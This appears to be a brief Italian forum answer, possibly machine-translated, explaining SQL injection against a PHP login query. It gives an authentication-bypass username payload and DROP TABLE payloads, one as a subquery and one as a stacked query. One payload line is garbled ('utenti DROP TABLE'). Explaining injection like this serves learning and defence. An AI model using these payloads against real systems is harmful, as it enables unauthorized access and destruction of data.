Qualcosa del genere dovrebbe fare:
- Per accedere come utente "foo", imposta il nome utente su "foo' -- "
In questo modo la tua query assomiglierà a
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
Il "--" significa che il resto della riga è commentato
- Non sono sicuro che funzionerà, ma prova a impostare il nome utente su "foo' OR (utenti DROP TABLE) -- "
In questo modo la tua query assomiglierà a:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
potrebbe non accettarlo però - penso che le sottoquery possano solo SELEZIONARE.
La funzione mysql_query eseguirà solo una query, gli altri ti permetterebbero di farlo:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");
